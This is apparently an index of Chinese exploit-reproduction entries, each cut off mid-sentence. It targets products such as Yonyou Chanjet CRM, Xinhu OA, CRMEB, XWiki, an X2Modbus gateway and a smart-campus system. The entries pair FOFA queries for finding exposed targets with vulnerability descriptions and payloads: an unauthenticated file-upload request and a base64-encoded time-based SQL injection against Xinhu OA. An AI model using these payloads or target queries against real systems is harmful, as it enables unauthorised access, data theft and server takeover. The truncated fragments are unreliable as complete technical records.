Y1-2用友-畅捷通CRM-任意文件上传 fofa语法: app.name=“用友 CRM” 漏洞复现: payload: POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1 Host: User-Agent: Mozill
Y1-1用友-畅捷通CRM-SQL 漏洞描述: 用友畅捷CRMcreate_site.php处存在SQL时间盲注,未对后台功能做有效的身份认证与用户的输入进行安全过滤,导致在权限绕过可直接访问后台存在SQL注入漏洞的缺陷路径,攻击者可以利用该漏洞获取网站后台数据库敏感信息,进一步利用可接管服务器权限
X15-3信呼-OA-SQL 漏洞描述: 在信呼OA系统2.6.2版本的/webmain/task/openapi/openmodhetongAction.php文件中,存在一个前台SQL注入漏洞。当$nickName变量经过base64解码后被加入到uarr数组中,并最终传递给$db->recor
X15-2信呼-OA-SQL 漏洞复现: payload: GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP/1.1 Host: User-A
X15-1信呼-OA-SQL fofa语法: app=“信呼-OA系统” 漏洞复现: payload: GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw==
X14-1新视窗-物业管理系统-SQL 漏洞描述: 新视窗新一代物业管理系统的XML Web services接口GetCertificateInfoByStudentId 实例处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点
X13-1西安众邦-CRMEB开源电商系统-SQL 漏洞描述: 该漏洞可利用SQL注入,获取后台数据库权限,获取绝对路径写入后门文件,进而接管服务器权限。互联网资产受影响资产占比 影响版本: CRMEB <= v.5.2.2 网站图片: fofa语法: body=“/wap/first/zsff/i
X12-1XWiki-开源wiki和应用平台-RCE 漏洞描述: XWiki 14.10.20 之前版本存在远程代码执行漏洞,改漏洞源于DatabaseSearch 接口代码设置不当缺陷,导致未经身份验证的远程攻击者可以执行任意Groovy代码或任意系统指令,从而获取服务器权限。该漏洞利用难度较低,
X11-1迅饶科技-X2Modbus网关-InformationLeakage 漏洞描述: X2Modbus网关GetUser接口存存在信息泄露漏洞,未经身份验证的攻击者可利用此漏洞获取管理员账号密码等凭证信息登录后台,使系统处于极不安全的状态。 网站图片: 网络测绘: fofa语法: FOFA:s
X10-1新开普-智慧校园系统-RCE 漏洞描述: 新开普智慧校园系统/service_transport/service.action接口处存在FreeMarker模板注入,攻击者可在未经身份认证的情况下,调用后台接口,构造恶意代码实现远程代码执行,最终可造成服务器失陷(edu刷分神洞) 影响版本
